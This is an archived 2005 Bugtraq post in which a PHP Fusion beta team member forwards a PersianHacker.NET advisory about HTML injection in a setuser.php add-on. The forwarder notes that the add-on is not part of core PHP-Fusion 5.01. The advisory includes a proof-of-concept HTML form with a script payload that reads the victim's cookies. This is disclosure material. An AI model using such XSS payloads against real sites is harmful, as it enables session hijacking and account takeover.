| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <002f01c52cc9$61bad510$6400a8c0@prometheus> Date: Sat, 19 Mar 2005 16:19:48 -0500 From: "Sheldon King" <sheldon@...eblitz.com> To: <bugtraq@...urityfocus.com> Subject: Fw: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability This is not part of PHP Fusion v5.01 This is an available mod addon supplied by the main developer Digitanium for an IIS Compatibility. This setuser.php will not implemented into PHP Fusion until v5.02 and is not mainstream accross the fusion community. I have notified the main developer Digitanium. Sheldon King PHP Fusion Beta Team ----- Original Message ----- From: "PersianHacker Team" <pi3ch@...oo.com> To: <bugtraq@...urityfocus.com> Sent: Saturday, March 19, 2005 3:20 AM Subject: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability Date: 2005 March Bug Number: 10 PHP-Fusion a light-weight open-source content management system (CMS) written in PHP. It utilises a mySQL database to store your site content and includes a simple, comprehensive adminstration system. PHP-Fusion includes the most common features you would expect to see in many other CMS packages More info @: http://php-fusion.co.uk/ Discussion: -------------------- The software does not properly validate user-supplied input in 'setuser.php'. A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PHP-Fusion software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user. Exploit: -------------------- <html> <head> <title>PHP-Fusion v5.01 Exploit</title> </head> <body> <h1>PHP-Fusion v5.01 Html Injection Exploit</h1> <form method="POST" action="http://www.example.com/setuser.php"> <b>XSS in register.php:</b><p> Username: <input type="text" name="user_name" size="48" value="XSS Injection Code"></p> <p> Password: <input type="text" name="user_pass" size="48" value="XSS Injection Code"></p> <p><input type='checkbox' name='remember_me' value='y'>Remember Me<br><br> exmple: <script>document.write(document.cookie)</script></p> <p> <input type='submit' name='login' value='RUN!' class='button'></p> </form> <p> </p> <p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p> </body> </html> Solution: -------------------- No solution was available at the time of this entry. Credit: -------------------- Discovered by PersianHacker.NET Security Team by Pi3cH (pi3ch persianhacker net) http://www.PersianHacker.NET Special Thanks: devil_box(for xss article), amectris, herbod. Help -------------------- visit: http://www.PersianHacker.NET or mail me @: pi3ch persianhacker net
Powered by blists - more mailing lists